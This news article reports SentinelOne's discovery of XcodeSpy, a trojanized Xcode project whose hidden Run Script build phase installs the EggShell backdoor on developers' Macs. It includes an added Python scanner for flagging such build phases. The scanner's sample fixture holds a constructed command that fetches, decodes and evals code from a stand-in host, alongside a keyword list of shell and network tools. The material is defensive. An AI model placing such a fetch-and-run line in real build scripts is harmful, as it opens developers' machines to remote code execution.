Security researchers discover macOS malware targeting iOS software developers

SentinelOne security researchers have discovered macOS malware that targets iOS software developers and have named it XcodeSpy. The malware, found in the wild, is designed to infiltrate projects built with Xcode, the development tool that Apple provides to developers for free.

If developers use an infected Xcode project to develop applications for platforms such as iOS, they are likely to inadvertently build the malicious project code into their own work. An Xcode project is a repository of all the files, resources, and information needed to build an application.

Specifically, the researchers found in the wild a trojanized code library that tries to install advanced surveillance malware on the developer's macOS device. The trojanized library is a copy of the legitimate open-source TabBarInteraction project.

The legitimate project lets developers easily build tab interactions (such as adding animation effects to iOS tab bars). Alongside the legitimate code, XcodeSpy adds an obfuscated "Run Script" build phase that executes when the developer starts a build of the project.

After contacting a remote server controlled by the attacker, the script downloads and installs a customized version of EggShell. EggShell is an open-source backdoor that can use the victim's microphone, camera, and keyboard to monitor the targeted user.
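As an added defender's check (not code from the article or from SentinelOne), the following Python scanner lists the Run Script build phases in an Xcode project's project.pbxproj and flags scripts that fetch from the network or decode and evaluate hidden commands; the embedded pbxproj fragment and the indicator list are constructed for illustration, not taken from the real sample.

```python
import re
import sys

# Constructed project.pbxproj fragment with one benign and one suspicious
# Run Script phase (illustrative only, not the real XcodeSpy sample).
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
        AA01 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        AA02 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "eval \"$(curl -s https://c2.example.invalid/x | base64 -D)\" &\n";
        };
/* End PBXShellScriptBuildPhase section */
'''

# Constructed indicator list: things a build-time lint script rarely needs.
SUSPICIOUS = ("curl ", "wget ", "base64", "eval ", "osascript",
              "nohup ", "| sh", "| bash", "python -c", "perl -e")

# One pbxproj object: `ID /* comment */ = { ... };` (indentation-agnostic).
PHASE_RE = re.compile(r'(\w+) /\* [^*]* \*/ = \{(.*?)\n\s*\};', re.S)
# The quoted script, allowing backslash-escaped characters inside it.
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')

def unescape(s):
    """Decode pbxproj string escapes (\\n, \\t, \\", \\\\)."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s)

def find_run_scripts(pbxproj):
    """Return every PBXShellScriptBuildPhase with its script and indicator hits."""
    found = []
    for pid, body in PHASE_RE.findall(pbxproj):
        if 'isa = PBXShellScriptBuildPhase;' not in body:
            continue
        m = SCRIPT_RE.search(body)
        script = unescape(m.group(1)) if m else ''
        hits = [k for k in SUSPICIOUS if k in script]
        found.append({'id': pid, 'script': script, 'hits': hits, 'suspicious': bool(hits)})
    return found

if __name__ == '__main__':
    # Usage: python scan_pbxproj.py [path/to/project.pbxproj]; defaults to the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for phase in find_run_scripts(text):
        print(('SUSPICIOUS' if phase['suspicious'] else 'ok'), phase['id'], phase['hits'])
```

Review any flagged phase by hand before building, since a benign script can legitimately call curl while a malicious one can avoid every keyword in the list.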


SentinelOne security researcher Phil Stokes pointed out in a blog post published on Thursday that they found two customized EggShell variants. Both were uploaded to VirusTotal through its web interface from Japan, on August 5th and October 13th respectively, and further samples were later found on the Macs of victims in the United States at the end of 2020.

For confidentiality reasons, SentinelOne is currently unable to provide more details about the in-the-wild (ITW) attack. However, based on the victims' reports, they are likely to be targets of North Korean Advanced Persistent Threat (APT) attackers once again.

Fortunately, so far the researchers have only observed one in-the-wild case, at an organization in the United States. However, the indicators they analyzed show that the campaign was active at least between July and October 2020, and it may also have targeted developers in the Asian region.

In addition, two months ago, Microsoft and Google researchers both stated that hackers with North Korean backgrounds were actively trying to infect the computers of security researchers. To win the researchers' trust, the hackers even spent several weeks carefully playing a role on Twitter.
